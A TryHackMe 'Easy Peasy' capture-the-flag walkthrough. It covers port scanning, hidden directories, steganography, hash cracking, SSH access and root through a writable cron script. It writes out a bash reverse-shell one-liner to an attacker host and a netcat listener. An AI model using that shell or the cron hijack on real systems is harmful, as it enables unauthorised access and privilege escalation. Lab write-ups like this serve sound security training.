Easy Peasy — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Easy Peasy — TryHackMe — WriteUp. Check it out!
First, deploy the machine and run nmap to find open ports.
nmap -A -T4 -p- -v <ip>
Nmap may take a long time to finish (this is a full-range scan of all 65535 ports), so be patient!
Well, there are 3 open ports. First let's access the website on port 80.
It's the default nginx page. Now we will use DirBuster to scan for hidden directories on this port (or, if you prefer the CLI, you can use gobuster).
There are 2 hidden directories: /hidden and /hidden/whatever. Let's access the first one.
It contains only this image, so maybe it's stego. Download the image to look for hidden data. You can find the image URL using Inspect Element or Ctrl+U.
steghide extract -sf imagename.jpg
Well, it looks like I cannot extract any data from this image. Let's try the other hidden dir.
It's another image. The page source is always worth checking, so let's look at it.
Well, as you can see, there is an encoded string, which may be the password for extracting the hidden data.
Copy this string and use icyberchef.com to decode it.
Well, it's not a password but a flag!
Maybe that's all for port 80. So let's go to the other HTTP port: 65524.
Well, it's an Apache default page. Scroll down and look carefully until you see the 3rd flag.
Now access /robots.txt to see if there is anything interesting.
Well, it looks like we need to change the User-Agent to get the flag. It's an MD5 hash. MD5 is a hash, not encryption, so it cannot be decrypted; instead, look it up in a precomputed table such as https://md5hashing.net
You will have the 2nd flag.
What next? Again, page source!
There it is. The hint says it's encoded with "ba…", so it will be some BaseXX encoding.
Again, put this string into icyberchef to decode it. Try the Base decoders until you find the right one. It's Base62.
Another hidden dir. Let’s access it.
Well, a nicely done page! Again, Ctrl+U.
You see an image and a hash. Download the image; the hash, once cracked, gives the password.
Copy this hash to a txt file.
Download the easypeasy.txt on TryHackMe and use john to crack that hash.
john --wordlist=easypeasy.txt <your-file-name.txt>
Wait for john to finish then run this cmd to show result:
john --show <your-file-name.txt>
Now I’ve got the password: mypasswordforthatjob
Now use that password to extract the hidden data from the image above.
steghide extract -sf binarycodepixabay.jpg
Enter the password when prompted. Now read secrettext.txt.
The password in it is written in binary. Convert it from binary to ASCII text.
Now I’ve got the password for ssh. So let’s ssh to the machine.
ssh boring@<ip> -p 6498
Enter the password and you’re in!
Read user.txt.
It's encoded with ROT13. So let's decode it.
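Both conversions above (the binary password from secrettext.txt and the ROT13 user flag) can be done locally without CyberChef. The following is an added example in POSIX shell, not part of the original writeup; the sample inputs are constructed for the demo and are not the real password or flag.

```shell
#!/bin/sh
# Added example (not from the writeup): decoders for the two encodings met on
# this box, the binary SSH password in secrettext.txt and the ROT13 user flag.
# Sample inputs below are constructed for the demo, not the real flag or password.

# bin2dec BITS: binary string -> decimal, using POSIX arithmetic only
# (bash's $((2#...)) would be shorter but does not work in sh/dash).
bin2dec() {
  bits=$1 n=0
  while [ -n "$bits" ]; do
    first=${bits%"${bits#?}"}          # leading character
    n=$((n * 2 + first))
    bits=${bits#?}
  done
  printf '%s' "$n"
}

# bin2txt "0110... 0110...": 8-bit groups (with or without separators) -> text
bin2txt() {
  s=$(printf '%s' "$1" | tr -d ' \t\n')
  out=""
  while [ ${#s} -ge 8 ]; do
    octet=${s%"${s#????????}"}         # first 8 bits
    s=${s#????????}
    oct=$(printf '%03o' "$(bin2dec "$octet")")
    out="$out$(printf "\\$oct")"       # octal escape -> character
  done
  printf '%s\n' "$out"
}

# rot13 TEXT: shift letters by 13 places; applying it twice is the identity
rot13() {
  printf '%s\n' "$1" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
}

# Demo on constructed input
bin2txt '01110100 01101000 01101101'     # thm
rot13 'synt{uryyb}'                      # flag{hello}
```

bin2txt strips whitespace first, so it accepts the binary string whether or not the octets are space-separated; any trailing group shorter than 8 bits is ignored rather than mis-decoded.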
Now let’s get root to get the final flag!
I will use find to look for all files belonging to boring:
find / -type f -user boring 2>/dev/null
Scroll down and you will see a secret cron job script.
Edit this .sh file and add this command to spawn a reverse shell:
bash -i >& /dev/tcp/<your-host-ip>/4444 0>&1
Then start a listener on your machine:
nc -lvnp 4444
Then wait for the cron job to run the script (running it yourself only gives a shell as boring; it is the cron job that runs it as root).
Go back to your machine; now I'm root!
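Rather than scrolling through the find output, you can check the crontab itself for the same foothold. This added example (shell; not from the writeup) reads a system crontab and prints every path in a job's command line that is an existing file writable by the current user. The crontab and the script it points at are constructed fixtures created in a temp directory.

```shell
#!/bin/sh
# Added example, not part of the original writeup: given a system crontab,
# list every path in each job's command that is an existing file writable by
# the current user. A writable script run by a root cron job is exactly the
# foothold used above.

# cron_writable_scripts CRONTAB_FILE
# System crontab format (/etc/crontab, /etc/cron.d/*):
#   min hour dom mon dow user command
# (a user's own crontab from `crontab -l` has no user field; adjust the read).
cron_writable_scripts() {
  grep -Ev '^[[:space:]]*(#|$)' "$1" | while read -r min hour dom mon dow user cmd; do
    case "$min" in *=*) continue ;; esac          # skip PATH=..., SHELL=... lines
    for tok in $cmd; do                           # every word of the command
      case "$tok" in
        /*) if [ -f "$tok" ] && [ -w "$tok" ]; then
              printf '%s (cron user %s): %s\n' "$tok" "$user" "$cmd"
            fi ;;
      esac
    done
  done
}

# build_demo_crontab DIR: constructed fixture. Creates a world-writable
# backup.sh and a crontab with two root jobs, one of which points at a
# script that does not exist. Prints the crontab path.
build_demo_crontab() {
  bdir=$1
  printf '#!/bin/bash\necho backing up\n' > "$bdir/backup.sh"
  chmod 777 "$bdir/backup.sh"
  cat > "$bdir/crontab" <<EOF
# constructed for the demo
PATH=/usr/local/bin:/usr/bin:/bin
* * * * * root $bdir/backup.sh
* * * * * root $bdir/missing.sh
EOF
  printf '%s\n' "$bdir/crontab"
}

# Stand-alone demo: only backup.sh is reported, missing.sh does not exist
demo_dir=$(mktemp -d)
cron_writable_scripts "$(build_demo_crontab "$demo_dir")"
rm -rf "$demo_dir"
```

On a real box run it as `cron_writable_scripts /etc/crontab` (and over /etc/cron.d/*); the `-w` test answers for the user you are logged in as, so it tells you whether editing the script, as done above, is possible from this account.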
Find the root flag (quote the glob so the shell does not expand it before find sees it):
find / -name "*.txt" 2>/dev/null
Get your final root flag!
The end.
HAPPY HACKING